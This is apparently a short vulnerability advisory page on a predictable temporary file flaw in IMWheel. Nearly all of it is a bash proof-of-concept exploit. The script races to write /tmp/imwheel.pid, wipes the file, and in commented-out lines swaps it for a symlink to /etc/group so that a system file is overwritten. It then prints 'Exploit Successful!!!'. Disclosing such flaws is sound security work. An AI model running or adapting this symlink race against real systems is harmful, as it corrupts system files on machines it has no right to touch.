|
|
IMWheel Predictable Temporary File Creation Vulnerability
No exploit is required. The following proof of concept is available: #!/bin/bash # you may have to adjust the number of characters in the print to # get the timing correct for the injection. Fewer characters seems # to prevent this from working. Optionally, replacing the echo # with the symlink creation at the end of this script seems to work # fairly regularly. CHARCOUNT=4000 echo `perl -e 'print "9" x $CHARCOUNT;'` > /tmp/imwheel.pid while [[ $? != 0 ]]; do echo `perl -e 'print "9" x $CHARCOUNT;'` > /tmp/imwheel.pid done # Wait for imwheel to write it's pid to the new file sleep 1 # Wipe the contents of the PID file. echo > /tmp/imwheel.pid # Optionally, replace the new file with a link # rm /tmp/imwheel.pid # ln -s /etc/group /tmp/imwheel.pid echo "Exploit Successful!!!" |
|
Privacy Statement |